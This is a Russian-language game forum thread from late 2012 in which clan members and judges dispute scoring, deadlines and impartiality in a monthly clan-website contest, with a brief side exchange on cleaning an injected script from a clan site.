Hegel, Я тоже стараюсь быть максимально объективным...
Но без сравнения не получается - когда оценки у нескольких КС одинаковые, хочется как бы понять критерии - почему

Chkalov - Ср 07 Ноя, 2012 13:46
Hegel, сэйнт был в мае и июле в этом году и все хотя он подает все время. Ирролал был 3 раза в этом году например, Квит 2 раза, Ежонок 2 раза, atz 2 раза, так что не вижу какого-то особого везения у Сэйнта.

БОД и Тамплиеры есть в каждой оценке почти - у нас в клане 4 человека подают заявки каждый месяц - не удивительно, что из 10 заявок 4 БОД и мы попадаем в 5-ку оценщиков.

Hegel - Ср 07 Ноя, 2012 15:11
Chkalov, пора добавлять КД на клан ;) оценщики в окс от клана нужны для понятных целей.. в лучшем случае разведать ситуацию и сравнить материалы, в худшем продвигать свой КС.

Chkalov - Ср 07 Ноя, 2012 15:19
Hegel, не вижу проблем - подавайте больше заявок - будет больше шансов. В прошлой оценке вон был перс от вашего клана. А количество заявок сейчас не дает возможности еще отсеивать -так это уже не рандом будет, а просто выбор оценщиков.

Hegel - Ср 07 Ноя, 2012 15:25
Chkalov, -
Цитируя Hegel:
) оценщики в окс от клана нужны для понятных целей..



Не хотите ли сделать систему когда один клан не может выставлять своих оценщиков 2 месяца подряд?


Или ты готов доказать, что оценщики беспристрастны :)

Chkalov - Ср 07 Ноя, 2012 18:30
Hegel, еще раз - у нас заявок 10 шт максимум. Если один клан не сможет два месяца подряд  - то минус БОД и Тампы - там уже едва наберется комиссия. А может и не наберется, смотря кто остальные. У нас не хватит оценщиков для такой системы. Времена когда мы 15 набирали давно прошли

Тарраска - Ср 07 Ноя, 2012 20:43
Цитируя Chkalov:
У нас не хватит оценщиков для такой системы. Времена когда мы 15 набирали давно прошли

Неужто усе так плохо? Тут же халява... Должны люди толпой валить.facepalm

Hegel - Ср 07 Ноя, 2012 21:00
Chkalov, 5человек как нибудь наберут и без тампов и бодов ) да и сп есть

atz - Чт 08 Ноя, 2012 10:16
Hegel, когда ты последний раз видел СП в комиссии?

Kniginia - Чт 08 Ноя, 2012 19:55
atz, если у меня все будет как запланировано, то с января я будуcool   Что же до других сотрудников, тут нельзя заставить.


З.Ы. Думаю, что Судьям стоит указывать свой браузер, будет полезно для прогеров.

Ирролан - Вс 11 Ноя, 2012 13:00
Kniginia, Работа ОКС за Октябрь завершена. Возникло несколько вопросов по Октябрю:
1. Судья 1 не завершил оценивание сайтов в отведённые регламентом сроки - какие меры будут приняты к данному судье?
2. Судья 2 не исправил оценки, вызвавшие нарекания у членов комиссии и ответственных за сайт -  какие меры будут приняты к данному судье?
3. В связи с вопросом 2: Можно ли считать таблицу оценки http://yo-bod.com/clansite/info/2012/10 итоговой или всё-таки последуют изменения?

Chkalov - Вс 11 Ноя, 2012 15:39
Ирролан, в понедельник итоги подведут - когда онлайн все будут

Ирролан - Вс 11 Ноя, 2012 15:44
Chkalov, http://yo-bod.com/news.php?readmore=1953 facepalm   и не только у вас уже итоги подвели

Секретарь - Вс 11 Ноя, 2012 16:25


Удалено Вс 11 Ноя, 2012 16:30 пользователем Секретарь

Секретарь - Вс 11 Ноя, 2012 16:27
Ирролан, Chkalov, официальные результаты будут оглашены на сайте СП, после чего таблицы можно считать итоговыми.

Chkalov - Вс 11 Ноя, 2012 16:33
Ирролан, наши журналисты поспешили праздновать победу чуток:)

Kniginia - Вс 11 Ноя, 2012 22:46
Цитируя Ирролан:
1. Судья 1 не завершил оценивание сайтов в отведённые регламентом сроки - какие меры будут приняты к данному судье?

Судья отстранен. Увы мне только 9 числа сообщил Судья, что был в командировке и не знал. (бывает, что ж поделать). Судья был отстранен в этой комиссии в следующем месяце не будет принят.

Цитируя Ирролан:
2. Судья 2 не исправил оценки, вызвавшие нарекания у членов комиссии и ответственных за сайт -  какие меры будут приняты к данному судье?

По вопросам к Судье2 вообще не было в ответах комментариев. Я так же была не согласна. В данный момент уже никак, но ближайшие 2 месяца этот Судья не будет участвовать в комиссии.

Цитируя Ирролан:
3. В связи с вопросом 2: Можно ли считать таблицу оценки http://yo-bod.com/clansite/info/2012/10 итоговой или всё-таки последуют изменения?

Вопрос об изменении оценок я обсужу, сейчас уже никого не выловить, завтра с работы приеду и буду поднимать вопрос.
И вообще я делаю выводы, что на спорные вопросы Судьям не хватает отведенного времени...facepalm

Ирролан - Вс 11 Ноя, 2012 22:50
Цитируя Kniginia:
на спорные вопросы Судьям не хватает отведенного времени
а по моему Судьям не хватает ответственности

Kniginia - Вс 11 Ноя, 2012 22:53
Ирролан, дело не только в этом. Пошла тенденция, что люди, даже не игроки, ЛЮДИ не хотят чего либо делать... Заставлять я не вижу смысла. Хотя оплата Судьям за ОКС при плотной работе - очень даже приятна.

Ангел Ночи - Пн 12 Ноя, 2012 2:12
Kniginia, приятна была голдой)

liestade - Пн 12 Ноя, 2012 6:34
Chkalov,  что ж Вы Нас то тут http://yo-bod.com/news.php?readmore=1953  "В оценке приняли участие сразу два новых участника. Bregan D`art  после длительного перерыва вновь включился в борьбу, но в Ноябре не вошел даже в 10-ку лучших." уже и в ноябре то списали.... cool

DAK_L7 - Пн 12 Ноя, 2012 17:17
Kniginia, времени вполне хватает. Просто не все судьи ответственно относятся ко второму этапу оценки.

DAK_L7 - Пн 12 Ноя, 2012 17:18
liestade, laugh ну извини

Kniginia - Пн 12 Ноя, 2012 20:50
Ангел Ночи, ну разводи Ерна, чтобы он опять дал функцию давать голду игрокам от СПcool  Тогда и творческая ОКС будет.rolleyes
DAK_L7, да и тянут многие до 9 числа... Нет бы пораньше начать...sad

Ангел Ночи - Пн 12 Ноя, 2012 22:22
Kniginia, разводить? йорна? я? это 3 несовместимые вещи)

Kniginia - Вт 13 Ноя, 2012 0:44
Ангел Ночи, а надо:)

Завтра новость с результатами ОКС за Октябрь будет завтра на новостной СП.

Золото до 15 числа кланам.
ЗП комиссии завтра.

liestade - Ср 14 Ноя, 2012 3:35
Цитируя Kniginia:
Завтра новость с результатами ОКС за Октябрь будет завтра на новостной СП.
facepalm завтра прошло biggrin

atz - Ср 14 Ноя, 2012 9:23
liestade, http://order.ereality.ru/news.php?readmore=3774 wink

DAK_L7 - Ср 14 Ноя, 2012 18:14
Kniginia, blink а че, зп комиссии уменьшилась? на на тыщу меньше, чем в прошлый раз заплатили...sad

atz - Ср 14 Ноя, 2012 18:54
DAK_L7, лучше спросить кто и по каким критериям определяет этот размер для каждого члена комиссии.

Chkalov - Ср 14 Ноя, 2012 20:06
а где вообще прописаны размеры премий?:)

Kniginia - Ср 14 Ноя, 2012 21:25
liestade, результаты были готовы еще 12.11, но я понадеялась на людей, а меня подвели.
DAK_L7, потому что все какие-то не активные были:( Хотя к вам нет претензийcool
atz, Chkalov, пункт 3.3blink  Примерно - не значит точно.

Я надеюсь, что в комиссии за Ноябрь не повторится недавняя ситуация, когда надо бегать за Судьями...

DAK_L7 - Чт 15 Ноя, 2012 19:56
Kniginia, я в печали...((

Бульвинкль - Чт 15 Ноя, 2012 19:58
Kniginia, уже второй месяц подряд такая карусель с комиссией...вам не кажется что пора бы ввести другие санкции к таким судьям за которыми приходится бегать?

Kniginia - Чт 15 Ноя, 2012 20:48
DAK_L7, sad
Бульвинкль, есть такое понятие, как человеческий фактор, случится может всякое. Но вот легкое отношение и отсутствие серьезного подхода печалят. Но реал всегда важней.

atz - Пт 16 Ноя, 2012 6:39
Бульвинкль, ты всегда уверен в завтрашнем дне? я думаю, что нет... всегда есть что-то, что может помешать... а уж тем более, когда ты подал заявку 11 числа месяца и до первого числа может случится всё, что хочешь...

Ирролан - Вс 02 Дек, 2012 13:23
Цитируя SaintDragon:
3.4. Регламент работы:
...
~ 30, 31 формирование состава ОКС (исключение - февраль, 28 или 29 формируется состав)
~ 1 - 6 выставление оценок
....

Что-то невидно, что сформирован состав ОКС, а сегодня уже 2е. Потом жюри будет говорить, что им не хватило времени на оценку dry
P. S. А не пора бы сменить дизайн сайтов на зимний вариант? wub

Kniginia - Вс 02 Дек, 2012 13:41
Ирролан, вчера я Чкалову не отписалась с этим вопросом... А сегодня его еще не былоsad

Kniginia - Вс 02 Дек, 2012 15:15
Комиссия сформирована. ЛС разосланы.

liestade - Вт 04 Дек, 2012 0:41
В комисии за ноябрь, Судья № 5, покажись-ка cool  и объясни как можно требовать от сайтов за осенний месяц зимнего оформления и оценку ставить учитывая наличие/отсутствие новостей на НЛ, когда уже давно нет категорий "Оформление" и "Новостная лента" ???wacko   ну и многое прочее... оценка для Широв и Бразеров одинакова с нашей, а должна быть последовательность Бразеры-Брэган-Ширы ? по качеству хотя бы ИП... остальное думаю еще спросят

Ангел Ночи - Вт 04 Дек, 2012 1:01
Судья5: дата оценки 03.12
новогоднего оформления нет.
одна новость за ноябрь месяц. минус.
что за "clan" в результатах оценки клановых сайтов? http://other.erclans.ru/viewpage.php?page_id=18 минус.
ребят, гайды, добавленные в сентябре (рыцарь хаоса и полемарх) в декабре месяце у вас до сих пор отображаются как новые.
в целом, стандартный набор гайдов и сервисов.

Ангел Ночи - Вт 04 Дек, 2012 1:02
Вопрос раз.
что за "clan" в результатах оценки клановых сайтов? http://other.erclans.ru/viewpage.php?page_id=18 минус. Это АПИ Chkalov"a, это у него лишний клан, а не у нас.

Вопрос два.
новогоднего оформления нет. одна новость за ноябрь месяц. минус. ребят, гайды, добавленные в сентябре (рыцарь хаоса и полемарх) в декабре месяце у вас до сих пор отображаются как новые. Новостей на КС может вообще не быть, они в оценки не входят. Пишиться там нью или нет на оценку влиять не должно, да и нью может значить обновленный, а видите вы лишь дату добавления.

KWiT_ - Вт 04 Дек, 2012 2:22
Тоже вопрос к судье 5... Пока без претензий...
Вы вообще в курсе, что оценка изменилась и теперь оцениваются только сервисы и инф. портал? А то по вашим комментариям получается, что вы не в курсе....

Да, мы умеем писать аналитические статьи... Вот только оказалось, что они мало кому нужны - а работать за спасибо, увы, не всегда и не у всех есть время

Дракх - Вт 04 Дек, 2012 2:44
опять понабирали facepalm   Такое чувство, что человек оценивает все, что угодно, кроме собственно того, что надо оценивать blink  
У некоторых гайды устарели, но им ставят максимальную оценку. Зато другим, у кого работа над гайдами идет полным ходом, что заметно по появлению новых (в том числе и уникальных), ставится та же оценка, что и раньше... Исходя вообще из чего выставляется оценка?

atz - Вт 04 Дек, 2012 6:09
оценку, за отсутствие оформление - я никому не снизил. я лишь просто написал, что ожидал увидеть новогоднее оформление.excl   

Ангел Ночи, на счет "clan". если вы используете эти api и если вы видите такую ошибку - разумнее, либо ее исправить самостоятельно, либо связаться с Chkalov'ым и указать на эту ошибку, не?

liestade, Ангел Ночи, KWiT_, на счет новостей. я тоже в клане сталкивался с такой проблемой и мне Kniginia сказала, что снижение оценки в информационном портале за отсутствие новостей - правомерно.
вы не находите в этом логики? а иначе смысл оценивать у 85% кланов из месяца в месяц одно и то же. опять же, максимум за это снимал один балл, не больше.

KWiT_ - Вт 04 Дек, 2012 10:16
atz,  опять 2 нюанаса...
Первое - смысл писать всем о новогоднем оформлении, если и у вас на сайте его нет?
Второе - опять возникает вопрос в определении что такое инфопортал. По моему мнению новости туда ну никак не входят. Максимум - аналитические статьи. И тогда тут как раз нам к гайдам и прочему можно ставить +, так как в ноябре у нас добавлена не просто новость, а небольшая аналитическая статья.

Но  - как я писал - пока я претензий не имею. А все вопросы задам в сервисе комиссии

ПыСы. Почему-то не сомневался, что "судьей 5" окажетесь именно вы

atz - Вт 04 Дек, 2012 12:25
KWiT_, первое - написал просто свои комментарии по сайту. как уже было сказано "баллы не снижал".
второе - те, у кого писались новости на протяжении всего месяца - к инф.порталу я добавил один балл. тем, у кого не писались - отнял один балл.
у кого было хоть что-то, я просто написал комментарий, но баллы не снижал.

p.s. я не удивлен вашей логике.

Ирролан - Вт 04 Дек, 2012 12:57
atz, Вот тут: http://forum.ereality.ru/topic157434/page10.html#post4854614 про то что, необходимо оценивать новостную ленту ни слова несказанно, следовательно ваши
Цитируя atz:
у кого писались новости на протяжении всего месяца - к инф.порталу я добавил один балл. тем, у кого не писались - отнял один балл.
действия не соответствуют правилам ОКС.
По поводу:
Цитируя atz:
Kniginia сказала, что снижение оценки в информационном портале за отсутствие новостей - правомерно.
Пусть ответственный за ОКС официально дополнит тогда регламент работы комиссии, а то получается что сайты оцениваются не в равных условиях. Один судья занет, что можно учитывать НЛ, другие не знаю. Одни сайты знают, что им добавят балл за новости, другим и невдомёк об этом  facepalm

KWiT_ - Вт 04 Дек, 2012 14:09
Цитируя atz:
у кого не писались - отнял один балл

Почему отняли, если новостная не оценивается? Добавлять - ваше право, хотя и тоже спорное, но вот отнимать не имеете права, т.к. это противоречит регламенту ОКС

Цитируя Ирролан:
Пусть ответственный за ОКС официально дополнит тогда регламент работы комиссии, а то получается что сайты оцениваются не в равных условиях.

Поддерживаю

Invoker - Вт 04 Дек, 2012 14:29
Не должны заинтересованные лица находится в составе судей. Ну это в идеале...

atz - Вт 04 Дек, 2012 14:30
Цитируя Invoker:
Не должны заинтересованные лица находится в составе судей. Ну это в идеале...

facepalm  предложите кого-нибудь, кто по вашей логике не является "заинтересованным лицом"...

Invoker - Вт 04 Дек, 2012 15:27
atz, да все кто угодно только не представители кланов участников ОКС )

Хотя, о чём это я. ))
По вашей логике нормально то, что люди сами себе ставят оценку и занижают оценки конкурентам.

Это в общем то одна из основ работы ОКС в данном варианте.

Hegel - Вт 04 Дек, 2012 18:04
кстати для оценщиков, у нас появиля кальк оружейника :) делает пока то же что и другие. Но в близжайшем будующем планирую прикрутить пару вкусных модов.. как ток домучаю сессию.

Ангел Ночи - Вт 04 Дек, 2012 18:18


Удалено Вт 04 Дек, 2012 19:24 пользователем Феррет

Ангел Ночи - Вт 04 Дек, 2012 18:19
Кстати у нас гайд по Кольцам Ветерана, его больше не у кого нету, так что нам плюс 2 бала за уникальностьwub

И плюс вон новость ^^^ из раздела, скандалы, интриги, расследования. Причем разоблачение преступника, нам в ИП еще плюс 2 балаwub wub

liestade - Вт 04 Дек, 2012 18:41
atz, biggrin laugh facepalm

Chkalov - Вт 04 Дек, 2012 18:48
он в СП уже

Ангел Ночи - Вт 04 Дек, 2012 18:49


Удалено Вт 04 Дек, 2012 19:24 пользователем Феррет

GaDoFF - Вт 04 Дек, 2012 19:02
Цитируя Ангел Ночи:
Кстати у нас гайд по Кольцам Ветерана, его больше не у кого нету

facepalm

Ангел Ночи - Вт 04 Дек, 2012 19:26


Удалено Вт 04 Дек, 2012 23:40 пользователем Феррет

Ангел Ночи - Вт 04 Дек, 2012 19:45
atz, логично, не логично, всем плевать, окс работает по правилам, и вы как судья являетесь рабом этих правил и обязаны им подчиняться.
Как вас в СП взяли если вам плевать на правила, а там только по правилам и работают.

Ангел Ночи - Вт 04 Дек, 2012 19:56


Удалено Вт 04 Дек, 2012 23:40 пользователем Феррет

liestade - Вт 04 Дек, 2012 22:44
Ангел Ночи, все быть может.... но отступать некуда - за спиной работа за месяц - обидно ж

liestade - Вт 04 Дек, 2012 22:46
Возможно, если у игроков возникает подозрение на заангажированность судей, их личные интересы в сторону того или иного клана или клан-сайта.... - может стоит вернуться к схеме оценки "игроки+СП" - где голоса СП более весомы?excl

Феррет - Вт 04 Дек, 2012 23:48
Дам небольшое пояснение по ситуации, пусть и отступив от сабжа.
Ангел Ночи, заявление о том что сотрудник СП берет или дает взятки - очень серьезное заявление, которое требует весомых доводов при этом с доказательством.
И речь идет не о atz, как идут попытки предоставить ситуацию

Invoker - Ср 05 Дек, 2012 0:02
Цитируя liestade:
вернуться к схеме оценки "игроки+СП"


вот эта схема более правдоподобна) хотя, я всё больше склоняюсь к идее, что в конкурсе должны участвовать не сайты, а конкретные сервисы в категориях ) тогда станет больше мотивации к постоянному улучшению сервисов и поддержанию актуальности информации в них )

Лично моё мнение, что на сайтах участниках много очень полезных, информативных сервисов, достойных поощрения, и было бы гораздо логичнее награждать уникальные работы задавая планку качества для всех нежели спонсировать клан казну одних и тех же кланов.

Ирролан - Ср 05 Дек, 2012 0:17
Цитируя liestade:
вернуться к схеме оценки "игроки+СП" - где голоса СП более весомы?

liestade, И что измениться? СП такие же люди, игроки пришедшие в СП из других кланов и так же могут оценивать понижая балл неугодному клану и повышая бывшему или дружественному.

Kniginia - Ср 05 Дек, 2012 0:34
Цитируя liestade:
как можно требовать от сайтов за осенний месяц зимнего оформления

В январе можно будет требовать. Сейчас рано. Поэтому претензия по отсутствию оформления НГ не уместна.
Цитируя liestade:
оценку ставить учитывая наличие/отсутствие новостей на НЛ, когда уже давно нет категорий "Оформление" и "Новостная лента"

Пока не будет возможности реализовать "Творческая ОКС" и не будет учитываться наполнение новостями,  а вот статьи это другое.
Цитируя liestade:
оценка для Широв и Бразеров одинакова с нашей, а должна быть последовательность Бразеры-Брэган-Ширы ? по качеству хотя бы ИП

Соглашусь, что у ШИРов ИП выше, чем 6 баллов.
Цитируя Дракх:
Исходя вообще из чего выставляется оценка?

Как всегда - объективное мнение.

atz, это было раньше, с изменением правил ОКС новостная не учитывается. Жаль, что не пересеклись днем в асе. Надеюсь завтра обсудим все вопросы.
Цитируя atz:
вы не находите в этом логики? а иначе смысл оценивать у 85% кланов из месяца в месяц одно и то же. опять же, максимум за это снимал один балл, не больше.

Опять же не совсем так. Сейчас кланы могут по чуть-чуть выходить с низов и добиваться большего. Оформление гайдов, статьей, написание сервисов и других актуальных вкусностей.

Цитируя atz:
те, у кого писались новости на протяжении всего месяца - к инф.порталу я добавил один балл. тем, у кого не писались - отнял один балл.
у кого было хоть что-то, я просто написал комментарий, но баллы не снижал.

Я рекомендую оставить +1 балл кланам, которые писали объемные, актуальные, интересные статьи, но не снижать за отсутствие таковых.
Новости из раздела " У нашего соклана Днюха\Свадьба\Рождение чада" я к статьям не отношу, это новости. К статьям я отношу - http://templars.erclans.ru/index.php?newsid=404, http://yo-bod.com/news.php?readmore=1961, http://naims.tk/index.php?option=com_content&task=view&id=1346&Itemid=53, http://brothers.erclans.ru/news.php?readmore=1169.
Цитируя Ирролан:
Пусть ответственный за ОКС официально дополнит тогда регламент работы комиссии, а то получается что сайты оцениваются не в равных условиях. Один судья занет, что можно учитывать НЛ, другие не знаю. Одни сайты знают, что им добавят балл за новости, другим и невдомёк об этом

Этого нет ни в одном регламенте. В критериях нет ни слова про новости. Вот критерии, которым должен придерживаться Судья http://yo-bod.com/clansite/comthread/98 (если не открывается, то позже сделаю репост здесь).

Ангел Ночи, по нарушению я проведу беседу, оценки будут исправлены. А вот домыслы были излишне... Не стоило, Леш, так горячится.sad  И дело не в "неугодных псто", а в сути. Неудачно пошутил=(

Цитируя liestade:
если у игроков возникает подозрение на заангажированность судей, их личные интересы в сторону того или иного клана или клан-сайта..

Стоит написать мне ЛС или здесь на форуме, чтобы был разбор ситуации.

liestade, при споре и не согласии Судей с оценкой, у СП больше, чем 1 голос.

liestade - Ср 05 Дек, 2012 1:32
Цитируя Kniginia:
Стоит написать мне ЛС или здесь на форуме, чтобы был разбор ситуации.

Да я просто продолжил идею Ангела ночи
Спасибо за Ваш емкий пост - уверенность появилась в здравом смысле)
Вопросы все равно ведь будем задавать в большом количестве)

Kniginia - Чт 06 Дек, 2012 22:43
Было принято решение продлить выставление оценок до 08.12 до 23:00 по серверу.
Далее пойдет в стандартном режиме работа комиссии.
Обсуждение оценок и вопросы по ним с 09.12 до 11 и 12 числа утверждение оценок.

Задавать вопросы по оценкам можно с момента закрытия таблицы Судьей.

liestade - Чт 06 Дек, 2012 22:48
Спасибо за информацию smile  - такие поблажки будут и впредь? или это исключение для хороших ребят только?)

Kniginia - Чт 06 Дек, 2012 23:01
liestade, это компенсация, что позже была сформирована комиссия.

KWiT_ - Сб 08 Дек, 2012 21:51
Сегодня опять обнаружил на клан-сайте код "левого" скрипта.
Постараюсь в ближайшее время убрать, хотя уже не знаю как оно цепляется, даже права на запись закрыл...
Если у кого-то выдает что-то антивирус - пишите в ЛС

Hegel - Сб 08 Дек, 2012 23:14
ага выдало. снизи блалл за СН.. хотя хотелось наипсать что нет нет обе категории.. ибо сайт проверять анриал

liestade - Вс 09 Дек, 2012 3:30
Итак, 9 число, оценки лишь 3-х судей, оценки суди № 5 касаемо нашего КС просто удивляют. Судья № 4 хоть и лоялен к нему, но это не есть норма. Прошу кураторов проэкта ОКС и оставшихся судей (судью) трезво взглянуть на вещи и пояснить ход оценки.
"7" - для нашего клан-сайта в оценке за деятельность по ноябрю минимальный бал, на наш критичный взгляд. Спасибо.

Hegel - Вс 09 Дек, 2012 8:31
liestade, дык.. оценивается не деятельность по всему сайту а только гайды и сервисы. Для большей аргументации выложите что реально изменилось в этих 2х категориях за последний месяц. Будет о чем потолковать)

AcerKot - Вс 09 Дек, 2012 11:51
Судья2: facepalm  гиде коменты

KWiT_ - Вс 09 Дек, 2012 12:13
К судье 2 - извините, но если проверять в последние дни, то у меня претензии к вам.
На сайте не было вирусов вплоть до 7.12, когда я их обнаружил. Может, на сутки раньше - до этого все было чисто.
К сожалению,  у меня нет возможности чистить сразу - ибо нет постоянного доступа к ФТП сайта

liestade - Вс 09 Дек, 2012 18:31
Hegel, http://forum.ereality.ru/topic93944/page15.html начните читать отсюда... надеюсь у вас нет предвзятости к нам + правки в севрисах
Дизайн, актуальность последним формулам, новый сервис по металлургу. Плюс все сервисы теперь на одной странице - удобнее работать.

liestade - Вс 09 Дек, 2012 18:32
оценки судьи 2 были выставлены после заявленного срока - их будут учитывать? facepalm nblink

liestade - Вс 09 Дек, 2012 18:36
Судья № 2 и № 5... а также уваждаемый  Hegel, оценки "7" в двух категориях для нас минимальны, будьте-добры, не занижайте их и не выбиваейте нас из призов. У нас наполение этих двух категорий выше чем у некоторых кланов в 10-ке.

liestade - Вс 09 Дек, 2012 18:42
Судья № 1 только что выставил оценки...
а как же ?...
Цитируя Kniginia:
Было принято решение продлить выставление оценок до 08.12 до 23:00 по серверу.

Chkalov - Вс 09 Дек, 2012 19:18
liestade, он не закрыл таблицу вовремя, видимо потому, что первый раз, продлим на день обсуждение

liestade - Вс 09 Дек, 2012 19:20
таких оценщиков ведь 2-е оказалось)

Hegel - Вс 09 Дек, 2012 20:05
liestade, я не судья 5 :)

liestade - Вс 09 Дек, 2012 20:23
я в курсе, там оборот "а также"...

Hegel - Пн 10 Дек, 2012 10:32
В среде клан-сайтов застой.. какой смысл развиваться если можно получать деньги от того что раз в месяц правишь пару гайдов.. ну или очень редко добавляешь новый.
Что хуже.. как решить подобную проблемму уже говорилось.. разрешить премировать "на руки" вот только йорн боится что лишние 200-300 золота уйдут кому то... а то что ежедневно сотни игроков сидя на боте, у некоторых 20х серебро просто "пылиться" на руках, ибо некуда потратить... это фигня :)

KWiT_ - Пн 10 Дек, 2012 11:17
Вот уже 3 дня как не могу задать вопросы по своему сайту.
К судье 2 - не соглачен с вашими оценками, т.к. если вы обнаружили вирус, то он был только 2 суток - как только узнал, сразу почистил.

К судье 1 - реально считаю оценки заниженными, т.к. у нас есть уникальные сервисы и гайды, и многие даже "не уникальные" являются одними из лучших в ГР. Кроме этого - ну хватит уже говорить об отсутствии своей переодевалки - их в ГР 2 (3, если еще фридомов считать")
А фраза о ссылке на разработчиков CMS вообще убила.... Вы хоть знаете, что такое "копирайт"?

Hegel - Пн 10 Дек, 2012 11:18
KWiT_, видимо он не изменил коммент) ведь обещалось 0-0, а как ты видишь 7-7 да и оценка на уровне остальных. Хотя вирусы эт плохо... как вы их умудрились себе занести то?)

KWiT_ - Пн 10 Дек, 2012 14:38
Hegel, я с 7-7 тоже не согласен.
По поводу вирусов - не знаю ни одного сайта на еркланс, где бы они иногда не появлялись. Вопрос, насколько оперативно решается с ними проблема.
У нас, повторюсь, до 6.12 было чисто, 6.12 я не заходил на сайт, 7.12 вечером я все почистил.

P.S. И рад бы, если б кто-то сказал, как обезопасить клан-сайт от вирусов.

Evgeska - Пн 10 Дек, 2012 15:16
Цитируя KWiT_:
P.S. И рад бы, если б кто-то сказал, как обезопасить клан-сайт от вирусов.



поменять пароль на фтп...и не сохранять его нигде после этого))

З.Ы. хотя это не дает 100% гарантии

KWiT_ - Пн 10 Дек, 2012 15:38
Evgeska, не поверишь - 2 раза уже так делал.
И никогда не храню его - только в текстовом файле, откуда потом Ctrl+c - Ctrl+v

Hegel - Пн 10 Дек, 2012 19:22
KWiT_, если вирус прописывается на фтп то тогда смотреть и назначать права для папок.. ну и обновить CMS можно.
Если вирус появляется в коде, то это похоже на иньекцию в бд, тоже проверять доступы.

liestade - Пн 10 Дек, 2012 21:27
теперь в сервисе ОКС выдает что вопросов еще нет blink

KWiT_ - Пн 10 Дек, 2012 22:07
Hegel, все доступы - только на чтение. БД еще проверю...
Обновлять CMS на данном этапе сложно - слишком много подвязано пол DLE

liestade - Пн 10 Дек, 2012 22:29
оценки никто не исправляет...dry

Hegel - Пн 10 Дек, 2012 23:27
KWiT_, дле обычно проще всего обновлять то.. ну жумла мб чуть проще.. Обновляй) там дыр стоко закрывают с каждым разом.. огого

Hegel - Вт 11 Дек, 2012 7:32
liestade для [Hegel]: ясно:) тогда не поддерживайте тех кто ставит 6, балы имеют значение - даже 1) спасибо
Hegel для [liestade]: эт подкуп?) где мои баранки
liestade для [Hegel]: почему подкуп? просьба не топить)


Судя по изменению оценки у 2х судей вверх, подобным образом общаются со всеми..
я извините останусь при своем мнении..

Больше этого меня развлекает вопрос по 10 в ИП КоХ, где 3 против 2 голосуют ... при том что оценки в таблице 3-10, 2 -9... Кто то на темную сторону перешел?)

p.s да я 2й

KWiT_ - Вт 11 Дек, 2012 11:44
Hegel,  обновляться-то обновляется... вот только от вирусов это не избавляет

liestade - Вт 11 Дек, 2012 13:58
Hegel,  biggrin facepalm
Давно мы с Вами не общались)
неужели разговоры, обсуждения, объяснения и вопросы относятся к категории "давление на судей"...?
Менять оценки - личное право оценщика, мое право - обратить внимание на ошибки
В случае не исправления оценок, и в данном контексте таких судей оказалось несколько. Но вы ошибаетесь, разговор я вел только с Вами и судьей № 5. Ибо Ваши оценки НЕ СООТВЕТСТВОВАЛИ реальному положению дел, несмотря на Ваш опыт оценивания.
И вы не написали в своем сообщении выше, о том почему вы не хотите менять оценку для нашего КС... Что же Вы ? Или теперь моя очередь вставлять скрины вчерашнего разговора?)

*saint* - Вт 11 Дек, 2012 14:56
Hegel, уху по ИП КоХ сам ффшоке...
судья 5 походу решил против своей оценки проголосовать

Hegel - Вт 11 Дек, 2012 15:44
liestade, я не вижу борьбы за содержимое сайта.. я вижу -
Цитируя liestade:
будьте-добры, не занижайте их и не выбиваейте нас из призов



Если работать сравниванием, что любит некоторый судья3, то сравните свои гайды с иными, анлимами и тампами. На мой взгляд ваши явно проигрывают. У анлимов и тампов так уник оформление хотя бы есть

liestade - Вт 11 Дек, 2012 15:49
Цитируя Hegel:
liestade, я не вижу борьбы за содержимое сайта.. я вижу -

борьба была выше на форуме: я вам ссылки давал на обновления в ИП, писал почему так... но ничего не менялось, ни на сервисе ОКС, ни здесь, ни объяснений, ни изменений оценок....

а про оценки - так это лишь объяснение причинно-следственной связи: если вы занижаете то мы, логично что и из призов выпадаем... вы ж об этом забываете - о сущности "Конкурс-призы"...  не более... не льстите себе)

Hegel - Вт 11 Дек, 2012 17:40
liestade, о итоговой расстановке я знаю только после окончания голосования.
2, я в окс не участвовал давно, и не следил за вашим сайтом и обновлениями, для меня большинство было новым) За исключением сайтов у которых за пол года ничего не появилось

Страницы: 1234567